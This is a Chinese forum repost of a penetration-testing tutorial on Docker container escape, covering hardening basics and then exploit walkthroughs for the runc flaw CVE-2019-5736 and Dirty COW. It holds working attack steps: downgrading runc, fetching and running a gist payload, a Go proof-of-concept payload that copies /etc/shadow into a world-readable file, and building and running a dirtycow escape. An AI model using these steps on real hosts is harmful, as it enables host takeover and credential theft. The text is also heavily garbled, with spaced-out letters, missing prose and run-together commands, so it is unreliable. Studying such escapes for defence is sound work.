[18250] 2021-01-04_干货渗透测试之Docker逃逸详解

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2021-01-04_干货渗透测试之Docker逃逸详解 | D o c k e r   H A C K   2 0 2 1 - 0 1 - 0 4 D o c k e r 使 D o c k e r - - D o c k e r D o c k e r     G o       A p a c h e 2 . 0   D o c k e r     L i n u x   使   i P h o n e     a p p ,   d o c k e r     d o c k e r   . 2 0 1 7 d o c k e r     d o c k e r     m o b y   d o c k e r - c e     d o c k e r - e e . d o c k e r - c e     d o c k e r     d o c k e r   . d o c k e r - e e     I T   . d o c k e r - i o ,   d o c k e r - e n g i n   . D o c k e r H y p e r v i s o r     H y p e r v i s o r   D o c k e r     L i n u x   N a m e s p a c e   宿 宿 C G r o u p s   宿 宿 宿 D o c k e r     - - s t o r a g e - o p t = [ ]     D e v i c e
M a p p e r     L i n u x     q u o t a     D o c k e r   使   X F S   使 使 使 使 使   - m     - m e m o r y   S e c c o m p S e c u r e   C o m p u t i n g   M o d e   L i n u x     D o c k e r     j s o n     s e c c o m p   p r o f i l e   D o c k e r   C o n t e n t   T r u s t D o c k e r   使   C V E     D o c k e r     D o c k e r   S e c u r i t y   S c a n n i n g C l a i r A n c h o r e T r i v y A q u a     D o c k e r     D o S   宿   D o S     D o c k e r   e t h 0     v e t h *   d o c k e r 0     e t h 0     v e t h *     L i n u x     t r a f f i c c o n t r o l l e r  
,   D o c k e r   1 8 . 0 6 . 0 - c e   C V E - 2 0 1 9 - 5 7 3 6 D o c k e r c o n t a i n e r d     r u n c   r u n C     D o c k e r   C L I   , r u n C   1 8 . 0 9 . 2   D o c k e r   宿   r u n C     e x e c   宿   r u n c     r u n c   宿   r o o t     r u n C     r u n C   ,   d o c k e r 使 ,   d o c k e r   , , w g e t   h t t p s : / / g i t h u b . c o m / o p e n c o n t a i n e r s / r u n c / r e l e a s e s / d o w n l o a d / v 1 . 0 . 0 - r c 6 / r u n c . a m d 6 4 m v   r u n c . a m d 6 4   / u s r / b i n / r u n c c h m o d   + x   / u s r / b i n / r u n c r u n c   - - v e r s i o n w g e t   h t t p s : / / g i s t . g i t h u b u s e r c o n t e n t . c o m / t h i n k y c x / e 2 c 9 0 9 0 f 0 3 5 d 7 b 0 9 1 5 6 0 7 7 9 0 3 d 6 a f a 5 1 / r a w / c h m o d   + x   i n d e x . h t m l . / i n d e x . h t m l d o c k e r   - - v e r s i o n
,   d o c k e r   ,   d o c k e r     b a s h , ,   d o c k e r     I D   p a y l o a d h t t p s : / / g i t h u b . c o m / F r i c h e t t e n / C V E - 2 0 1 9 - 5 7 3 6 - P o C   m a i n . g o ,   p a c k a g e ,   w i n d o w s   , l i n u x     m a i n , . s u d o   s y s t e m c t l   s t a r t   d o c k e r d o c k e r   r u n   - i t   u b u n t u : 1 8 . 0 4   " / b i n / b a s h " d o c k e r   p s p a c k a g e   m a i n v a r   p a y l o a d   =   " # ! / b i n / b a s h   n   c a t   / e t c / s h a d o w   >   / t m p / s h a d o w   & &   c h m o d   7 7 7   / t m p / s h a d o w " C G O _ E N A B L E D = 0 ; G O O S = l i n u x ; G O A R C H = a m d 6 4 g o   b u i l d   m a i n . g o
使 使   p a y l o a d   m a i n     / h o m e   , i d     d o c k e r   p s   ,   h o m e   ,   m a i n   , , ,   m a i n   , ,   p a y l o a d , i d     d o c k e r   p s   d o c k e r   c p   m a i n   x x x x x x x x x : / h o m e c d   / h o m e l s c h m o d   + x   m a i n . / m a i n d o c k e r   e x e c   - i t   x x x x x x x x x   / b i n / s h e x i t c d   / t m p / l s
宿 t m p s h a d o w p a y l o a d D i r t y   C O W ( C V E - 2 0 1 6 - 5 1 9 5 ) 使 u s e r 1 2 3 4 5 6 u s e r r o o t D o c k e r r o o t D o c k e r s u d o   s u   r o o t       / / r o o t 1 2 3 4 5 6           / / d o c k e r   i m a g e s       / / d o c k e r   r u n   - - n a m e = t e s t   - p   1 2 3 4 : 1 2 3 4   - i t d   d i r t y c o w   / b i n / b a s h       / / 使 1 2 3 4 d o c k e r 1 2 3 4 d i r t y c o w t e s t d o c k e r   e x e c   - i t   t e s t   / b i n / b a s h c d   / d i r t y c o w - v d s o /         / / d i r t y c o w - v d s o m a k e               / / 使 m a k e . c . / 0 x d e a d b e e f           / / 0 x d e a d b e e f  
s u c c e s s f u l l y   宿 退 D o c k e r   D o c k e r     1 9 . 0 3 . 1       C V E - 2 0 1 9 - 1 4 2 7 1   C V E - 2 0 1 9 - 5 7 3 6   r u n c     >   1 . 0 - r c 6   k 8 s   > 1 . 1 2   L i n u x   > = 2 . 6 . 2 2 C V E - 2 0 1 6 - 5 1 9 5 ( )   L i n u x   > = 4 . 1 4 C V E - 2 0 1 7 1 0 0 0 4 0 5 ( )   d o c k e r     r o o t     D o c k e r     p r i v i l e g e d   D o c k e r 宿   c a p - a d d = S Y S A D M I N   S Y S A D M I N     c o n t a i n e r     m o u n t u m o u n t   D o c k e r C V E - 2 0 1 6 - 5 1 9 5 C V E - 2 0 1 9 - 5 7 3 6 D o c k e r 宿 D o c k e r D o c k e r : H A C K c d   / h o m e             / / h o m e l s                 / / t o u c h   t e s t             / /   t e s t e x i t               / / 退 P O C e x i t               / / 退 D o c k e r c d   / h o m e             / / h o m e l s   - l               / /

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则